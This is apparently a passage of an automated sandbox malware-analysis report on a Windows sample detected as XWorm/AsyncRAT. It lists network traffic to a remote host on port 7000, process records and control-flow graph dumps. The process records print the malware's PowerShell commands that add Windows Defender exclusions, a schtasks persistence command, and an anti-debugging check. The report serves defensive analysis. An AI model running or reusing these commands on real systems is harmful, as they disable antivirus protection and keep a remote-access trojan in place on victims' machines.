                                                                                Nov 29, 2024 15:21:10.436276913 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:10.436297894 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:10.436476946 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:10.436492920 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:10.436506987 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:10.436526060 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:10.436570883 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:10.436587095 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:10.436705112 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:10.436722040 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:10.436762094 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:10.865014076 CET700049884103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:10.866269112 CET498847000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:10.986426115 CET700049884103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:11.155461073 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:11.202637911 CET499867000192.168.2.6103.230.121.124
                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Nov 29, 2024 15:19:00.840665102 CET5925553192.168.2.61.1.1.1
                                                                                Nov 29, 2024 15:19:00.978753090 CET53592551.1.1.1192.168.2.6
                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                Nov 29, 2024 15:19:00.840665102 CET192.168.2.61.1.1.10x5bc1Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                Nov 29, 2024 15:19:00.978753090 CET1.1.1.1192.168.2.60x5bc1No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                Nov 29, 2024 15:19:29.317481041 CET1.1.1.1192.168.2.60x8159No error (0)g-bing-com.ax-0001.ax-msedge.netax-0001.ax-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                Nov 29, 2024 15:19:29.317481041 CET1.1.1.1192.168.2.60x8159No error (0)ax-0001.ax-msedge.net150.171.28.10A (IP address)IN (0x0001)false
                                                                                Nov 29, 2024 15:19:29.317481041 CET1.1.1.1192.168.2.60x8159No error (0)ax-0001.ax-msedge.net150.171.27.10A (IP address)IN (0x0001)false
                                                                                • ip-api.com
                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                0192.168.2.649712208.95.112.1802968C:\Users\user\Desktop\file.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 15:19:01.105918884 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                                                Host: ip-api.com
                                                                                Connection: Keep-Alive
                                                                                Nov 29, 2024 15:19:02.302964926 CET175INHTTP/1.1 200 OK
                                                                                Date: Fri, 29 Nov 2024 14:19:01 GMT
                                                                                Content-Type: text/plain; charset=utf-8
                                                                                Content-Length: 6
                                                                                Access-Control-Allow-Origin: *
                                                                                X-Ttl: 60
                                                                                X-Rl: 44
                                                                                Data Raw: 66 61 6c 73 65 0a
                                                                                Data Ascii: false


                                                                                Click to jump to process

                                                                                Click to jump to process

                                                                                Click to dive into process behavior distribution

                                                                                Click to jump to process

                                                                                Target ID:0
                                                                                Start time:09:18:59
                                                                                Start date:29/11/2024
                                                                                Path:C:\Users\user\Desktop\file.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                Imagebase:0x630000
                                                                                File size:89'088 bytes
                                                                                MD5 hash:4347FB3A5B1EABF2E594A895A30B98F4
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3408817500.0000000002991000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.2125481379.0000000000632000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.2125481379.0000000000632000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3414135593.00000000129A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.3414135593.00000000129A1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3408817500.0000000002A5F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:low
                                                                                Has exited:false

                                                                                Target ID:2
                                                                                Start time:09:19:01
                                                                                Start date:29/11/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'
                                                                                Imagebase:0x7ff6e3d50000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:3
                                                                                Start time:09:19:01
                                                                                Start date:29/11/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff66e660000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:6
                                                                                Start time:09:19:09
                                                                                Start date:29/11/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'file.exe'
                                                                                Imagebase:0x7ff6e3d50000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:7
                                                                                Start time:09:19:09
                                                                                Start date:29/11/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff66e660000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:10
                                                                                Start time:09:19:25
                                                                                Start date:29/11/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\java.exe'
                                                                                Imagebase:0x7ff6e3d50000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:11
                                                                                Start time:09:19:25
                                                                                Start date:29/11/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff66e660000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:12
                                                                                Start time:09:19:28
                                                                                Start date:29/11/2024
                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                Imagebase:0x7ff7403e0000
                                                                                File size:55'320 bytes
                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                Target ID:16
                                                                                Start time:09:19:44
                                                                                Start date:29/11/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'java.exe'
                                                                                Imagebase:0x7ff6e3d50000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:17
                                                                                Start time:09:19:44
                                                                                Start date:29/11/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff66e660000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:18
                                                                                Start time:09:20:08
                                                                                Start date:29/11/2024
                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "java" /tr "C:\Users\user\AppData\Roaming\java.exe"
                                                                                Imagebase:0x7ff79f0f0000
                                                                                File size:235'008 bytes
                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:19
                                                                                Start time:09:20:08
                                                                                Start date:29/11/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff66e660000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:20
                                                                                Start time:09:20:09
                                                                                Start date:29/11/2024
                                                                                Path:C:\Users\user\AppData\Roaming\java.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Users\user\AppData\Roaming\java.exe
                                                                                Imagebase:0x300000
                                                                                File size:89'088 bytes
                                                                                MD5 hash:4347FB3A5B1EABF2E594A895A30B98F4
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\java.exe, Author: Joe Security
                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\java.exe, Author: Joe Security
                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\java.exe, Author: ditekSHen
                                                                                Antivirus matches:
                                                                                • Detection: 100%, Avira
                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                • Detection: 82%, ReversingLabs
                                                                                Has exited:true

                                                                                Target ID:21
                                                                                Start time:09:20:18
                                                                                Start date:29/11/2024
                                                                                Path:C:\Users\user\AppData\Roaming\java.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Users\user\AppData\Roaming\java.exe"
                                                                                Imagebase:0x7ff642ec0000
                                                                                File size:89'088 bytes
                                                                                MD5 hash:4347FB3A5B1EABF2E594A895A30B98F4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:22
                                                                                Start time:09:20:26
                                                                                Start date:29/11/2024
                                                                                Path:C:\Users\user\AppData\Roaming\java.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Users\user\AppData\Roaming\java.exe"
                                                                                Imagebase:0x100000
                                                                                File size:89'088 bytes
                                                                                MD5 hash:4347FB3A5B1EABF2E594A895A30B98F4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:23
                                                                                Start time:09:21:01
                                                                                Start date:29/11/2024
                                                                                Path:C:\Users\user\AppData\Roaming\java.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Users\user\AppData\Roaming\java.exe
                                                                                Imagebase:0x700000
                                                                                File size:89'088 bytes
                                                                                MD5 hash:4347FB3A5B1EABF2E594A895A30B98F4
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Reset < >

                                                                                  Execution Graph

                                                                                  Execution Coverage:25.5%
                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                  Signature Coverage:33.3%
                                                                                  Total number of Nodes:9
                                                                                  Total number of Limit Nodes:0

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 15 7ffd34819469-7ffd348194fd call 7ffd34818f40 call 7ffd34810388 call 7ffd348180d8 26 7ffd348194ff-7ffd3481952c call 7ffd34810398 15->26 27 7ffd34819531-7ffd34819554 15->27 26->27 31 7ffd3481a60d-7ffd3481a614 27->31 32 7ffd3481955a-7ffd34819567 27->32 35 7ffd3481a61e-7ffd3481a625 31->35 33 7ffd3481956d-7ffd348195ab 32->33 34 7ffd348198c8 32->34 40 7ffd348195b1-7ffd348195ce call 7ffd34818358 33->40 41 7ffd3481a5e8-7ffd3481a5ee 33->41 37 7ffd348198cd-7ffd34819901 34->37 38 7ffd3481a636-7ffd3481a63d 35->38 39 7ffd3481a627-7ffd3481a631 call 7ffd34810378 35->39 46 7ffd34819908-7ffd3481994a 37->46 39->38 40->41 50 7ffd348195d4-7ffd3481960e 40->50 44 7ffd3481a5f0-7ffd3481a607 41->44 45 7ffd3481a642-7ffd3481a682 41->45 44->31 44->32 59 7ffd3481996f-7ffd348199a3 46->59 60 7ffd3481994c-7ffd3481996d 46->60 57 7ffd3481966d-7ffd34819695 50->57 58 7ffd34819610-7ffd34819663 50->58 65 7ffd34819f89-7ffd34819fb1 57->65 66 7ffd3481969b-7ffd348196a8 57->66 58->57 64 7ffd348199aa-7ffd348199ec 59->64 60->64 83 7ffd348199ee-7ffd34819a0f 64->83 84 7ffd34819a11-7ffd34819a45 64->84 65->41 72 7ffd34819fb7-7ffd34819fc4 65->72 66->34 68 7ffd348196ae-7ffd348197a0 66->68 126 7ffd34819f60-7ffd34819f66 68->126 127 7ffd348197a6-7ffd348198a3 call 7ffd34810358 68->127 72->34 75 7ffd34819fca-7ffd3481a0c0 72->75 115 7ffd3481a0c6-7ffd3481a129 75->115 116 7ffd3481a73c-7ffd3481a777 75->116 88 7ffd34819a4c-7ffd34819aeb 83->88 84->88 130 7ffd3481a12f-7ffd3481a192 115->130 131 7ffd3481a77c-7ffd3481a7b7 115->131 126->45 128 7ffd34819f6c-7ffd34819f83 126->128 127->37 163 7ffd348198a5-7ffd348198c6 127->163 128->65 128->66 139 7ffd3481a7bc-7ffd3481a7f0 130->139 147 7ffd3481a198-7ffd3481a260 130->147 131->139 143 7ffd3481a7f7 139->143 143->143 147->41 163->46
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3426952229.00007FFD34810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34810000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd34810000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: B
                                                                                  • API String ID: 0-1255198513
                                                                                  • Opcode ID: d18337cae9e8d5ba4eb8018ab51105cb8786643cf2ed1739a02278c2ab9fd0f7
                                                                                  • Instruction ID: 4a6b8359cfe3999513ea99930a7c1aca65e6c2ce3faf9230943587b28e6e156a
                                                                                  • Opcode Fuzzy Hash: d18337cae9e8d5ba4eb8018ab51105cb8786643cf2ed1739a02278c2ab9fd0f7
                                                                                  • Instruction Fuzzy Hash: 48624170B18A098FEB58EF68C4A57B9B7E2FF99314F144579D04ED3291DE38A881CB41

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 168 7ffd3481f6a0-7ffd34823bda 170 7ffd34823be1-7ffd34823bf8 168->170 171 7ffd34823bdc 168->171 172 7ffd34823c00-7ffd34823c2f 170->172 173 7ffd34823bfa-7ffd34823bff call 7ffd3481f6b8 170->173 171->170 177 7ffd34823c35-7ffd34823c51 172->177 178 7ffd348241e8-7ffd348241f0 call 7ffd3481f6b8 172->178 173->172 179 7ffd34823ed2-7ffd34823f4d 177->179 180 7ffd34823c57-7ffd34823c65 177->180 188 7ffd34824295-7ffd3482429d 178->188 189 7ffd348241f5-7ffd34824247 178->189 196 7ffd34824143-7ffd34824182 179->196 197 7ffd34823f53-7ffd34823f70 179->197 182 7ffd34823c67 180->182 183 7ffd34823c6c-7ffd34823c83 180->183 182->183 186 7ffd34823e84-7ffd34823e93 183->186 187 7ffd34823c89-7ffd34823d59 call 7ffd3481f7b0 call 7ffd3481cd90 183->187 191 7ffd34823e95 186->191 192 7ffd34823e9a-7ffd34823eca 186->192 237 7ffd34823d5f-7ffd34823dbe 187->237 238 7ffd34823e19-7ffd34823e2c 187->238 201 7ffd34824251-7ffd34824282 189->201 191->192 203 7ffd34823ecb-7ffd34823ecd 192->203 206 7ffd34824184 196->206 207 7ffd34824189-7ffd34824194 196->207 211 7ffd34823f72-7ffd34823f95 197->211 212 7ffd34823f9a-7ffd34823fe6 197->212 209 7ffd34824289-7ffd34824294 201->209 204 7ffd348241e4-7ffd348241e6 203->204 204->189 206->207 214 7ffd34824196 207->214 215 7ffd3482419b-7ffd348241a2 207->215 209->188 232 7ffd34824023-7ffd34824034 211->232 212->232 214->215 219 7ffd348241a4 215->219 220 7ffd348241a9-7ffd348241b0 215->220 219->220 222 7ffd348241b2 220->222 223 7ffd348241b7-7ffd348241ba 220->223 222->223 226 7ffd348241c1-7ffd348241e3 223->226 227 7ffd348241bc 223->227 226->204 227->226 232->196 237->238 241 7ffd34823e2e 238->241 242 7ffd34823e33-7ffd34823e3a 238->242 241->242 244 7ffd34823e41-7ffd34823e48 242->244 245 7ffd34823e3c 242->245 246 7ffd34823e4f-7ffd34823e52 244->246 247 7ffd34823e4a 244->247 245->244 248 7ffd34823e54 246->248 249 7ffd34823e59-7ffd34823e82 246->249 247->246 248->249 249->203
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3426952229.00007FFD34810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34810000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd34810000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: K_H
                                                                                  • API String ID: 0-313846638
                                                                                  • Opcode ID: d74b08c3683e68942522e5d248b9b932d4f21b04f03990ae3afec17f6ae95343
                                                                                  • Instruction ID: 13a396fc1a64649e6e466ef0e9bbdf2e6e0078ea5b467c9cb60e46a5d1a3b598
                                                                                  • Opcode Fuzzy Hash: d74b08c3683e68942522e5d248b9b932d4f21b04f03990ae3afec17f6ae95343
                                                                                  • Instruction Fuzzy Hash: E9F13070A199198FDB98EB6CD8A5BB8B7F1FB59310F1041B9D44DE3291DF38A981CB40

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 388 7ffd34817a8b-7ffd34817b2d CheckRemoteDebuggerPresent 392 7ffd34817b2f 388->392 393 7ffd34817b35-7ffd34817b78 388->393 392->393
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3426952229.00007FFD34810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34810000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd34810000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CheckDebuggerPresentRemote
                                                                                  • String ID:
                                                                                  • API String ID: 3662101638-0
                                                                                  • Opcode ID: 1f968d0e380239ff8220d14084d44d2886f6eae6967e74473248f7051cc0497e
                                                                                  • Instruction ID: 1bbfd8b61724fcd8aef12b6a9c14021c3590002b005f6e58f0e1e96da61fa9d0
                                                                                  • Opcode Fuzzy Hash: 1f968d0e380239ff8220d14084d44d2886f6eae6967e74473248f7051cc0497e
                                                                                  • Instruction Fuzzy Hash: 5931C231908A1C8FDB68DF98D8866F97BE0EF65311F04412AD489D7241CB74A8568B91

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 395 7ffd348113cd-7ffd348113d2 396 7ffd348113d4-7ffd348113e2 395->396 397 7ffd34811367-7ffd34811372 395->397 401 7ffd348113e4-7ffd34811449 396->401 402 7ffd34811377-7ffd34811392 396->402 399 7ffd34811374-7ffd34811375 397->399 400 7ffd34811307-7ffd34811341 397->400 399->402 400->399 423 7ffd34811343-7ffd34811365 400->423 430 7ffd3481147b-7ffd348114a2 401->430 431 7ffd3481144b-7ffd34811472 401->431 415 7ffd34811394-7ffd3481139c 402->415 416 7ffd34811327-7ffd3481132e 402->416 421 7ffd3481139e-7ffd348113c8 415->421 422 7ffd34811331-7ffd34811341 415->422 416->422 422->399 422->423 423->397 441 7ffd348114a4-7ffd348114a7 430->441 442 7ffd348114d8-7ffd348114f9 430->442 435 7ffd34811474-7ffd3481147a 431->435 436 7ffd348114a8-7ffd348114d6 431->436 435->430 436->442 441->436
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3426952229.00007FFD34810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34810000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd34810000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4M_I
                                                                                  • API String ID: 0-342628054
                                                                                  • Opcode ID: 632dfab0a2809d068e3d847e922577d8a95963cc298076bd8e7ac50e187f2633
                                                                                  • Instruction ID: bff3d982eaa987311b3422b88fdaebde5ec40a9cb9e1bbf5211682f4f57dffe0
                                                                                  • Opcode Fuzzy Hash: 632dfab0a2809d068e3d847e922577d8a95963cc298076bd8e7ac50e187f2633
                                                                                  • Instruction Fuzzy Hash: D3B18443B0EAC61EE753A76C58B50E97FA0EF57265B0902F7C1D9CA093ED0D680AD391

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 711 7ffd34821a4a-7ffd34821ad5 715 7ffd3482266e-7ffd3482267c 711->715 716 7ffd34821adb-7ffd34821b05 711->716 719 7ffd34821e56-7ffd34821e59 716->719 720 7ffd34821b0b-7ffd34821b26 716->720 721 7ffd34821e5f-7ffd34821e62 719->721 722 7ffd34822668-7ffd3482266d 719->722 720->719 726 7ffd34821b2c-7ffd34821b84 720->726 721->716 723 7ffd34821e68 721->723 722->715 723->715 730 7ffd34821e6d-7ffd34821f3f call 7ffd34810d40 726->730 731 7ffd34821b8a-7ffd34821bda 726->731 791 7ffd34821f46 730->791 739 7ffd34821be0-7ffd34821c30 731->739 740 7ffd34821f4b-7ffd34821f92 call 7ffd34810d40 731->740 750 7ffd348220f4-7ffd34822134 739->750 751 7ffd34821c36-7ffd34821c86 739->751 759 7ffd34821da6 740->759 760 7ffd34821f98-7ffd34821f9f 740->760 750->759 778 7ffd3482213a-7ffd3482219e 750->778 770 7ffd348221ba-7ffd348221c6 751->770 771 7ffd34821c8c-7ffd34821cdc 751->771 768 7ffd34821dab-7ffd34821db1 759->768 763 7ffd34821fa1-7ffd34821fa3 760->763 764 7ffd34821fa5-7ffd34821fcc 760->764 767 7ffd34821fce-7ffd3482203f 763->767 764->767 767->759 841 7ffd34822045-7ffd3482204c 767->841 779 7ffd34821db4-7ffd34821db7 768->779 770->759 775 7ffd348221cc-7ffd348221dc 770->775 799 7ffd348222ad-7ffd348222ed 771->799 800 7ffd34821ce2-7ffd34821d32 771->800 775->715 790 7ffd348221e2-7ffd34822222 775->790 825 7ffd348221ad-7ffd348221b5 call 7ffd3481bbd0 778->825 826 7ffd348221a0-7ffd348221a8 call 7ffd3481bbd8 778->826 783 7ffd34821dbd-7ffd34822470 779->783 784 7ffd34821e42-7ffd34821e46 779->784 783->715 793 7ffd34822476-7ffd348224d2 call 7ffd34810d40 783->793 784->722 788 7ffd34821e4c-7ffd34821e50 784->788 788->719 788->726 790->759 820 7ffd34822228-7ffd34822242 790->820 791->715 793->759 852 7ffd348224d8-7ffd34822505 call 7ffd34821690 793->852 799->759 828 7ffd348222f3-7ffd348222fa 799->828 822 7ffd34821d38-7ffd34821d88 800->822 823 7ffd34822397-7ffd348223d7 800->823 820->759 839 7ffd34822248-7ffd348222a8 call 7ffd34821690 820->839 860 7ffd34821dc2-7ffd34821e12 822->860 861 7ffd34821d8a-7ffd34821d96 822->861 823->759 869 7ffd348223dd-7ffd34822464 call 7ffd34810d40 call 7ffd3481ed60 823->869 825->715 826->715 836 7ffd34822301-7ffd34822329 828->836 837 7ffd348222fc-7ffd348222ff 828->837 844 7ffd3482232b-7ffd34822392 call 7ffd3481bbd8 836->844 837->844 839->715 842 7ffd3482204e-7ffd34822051 841->842 843 7ffd34822053-7ffd3482207b 841->843 849 7ffd3482207d-7ffd348220ef call 7ffd3481ed60 842->849 843->849 844->715 849->715 852->759 886 7ffd3482250b-7ffd34822528 852->886 860->784 891 7ffd34821e14-7ffd34821e20 860->891 861->759 867 7ffd34821d98-7ffd34821d9f 861->867 867->768 874 7ffd34821da1-7ffd34821da4 867->874 869->715 874->779 886->759 897 7ffd3482252e-7ffd3482254b 886->897 891->759 896 7ffd34821e22-7ffd34821e29 891->896 899 7ffd34821e30-7ffd34821e36 896->899 900 7ffd34821e2b-7ffd34821e2e 896->900 897->759 912 7ffd34822551-7ffd348225b3 call 7ffd3481bbd0 897->912 903 7ffd34821e39-7ffd34821e3c 899->903 900->903 903->784 904 7ffd348225b8-7ffd348225bf 903->904 904->715 909 7ffd348225c5-7ffd34822666 call 7ffd34810d40 call 7ffd3481bbd0 904->909 909->715 912->715
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3426952229.00007FFD34810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34810000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd34810000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ea58318b3471076e3b4d55a6fb4d81f38756fd7221f56635ec85da3d266db275
                                                                                  • Instruction ID: 9bdc23eeca0b738d66dfa805d0d0041e9909197d604743d74ba29b266f8fafa2
                                                                                  • Opcode Fuzzy Hash: ea58318b3471076e3b4d55a6fb4d81f38756fd7221f56635ec85da3d266db275
                                                                                  • Instruction Fuzzy Hash: E572B630B1CA094FEB64EB6C84AA67977D2FF99341F54467DE44DC32D2DE2CA8418742
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3426952229.00007FFD34810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34810000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd34810000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 50e11348e24d5565f64d28a0239072ee5343b2380655ae7a314aa95686061ccf
                                                                                  • Instruction ID: 835c71c56a4a52dd7651796565a9a9514ca6adb6ba2e2b02adc47c4e861f873e
                                                                                  • Opcode Fuzzy Hash: 50e11348e24d5565f64d28a0239072ee5343b2380655ae7a314aa95686061ccf
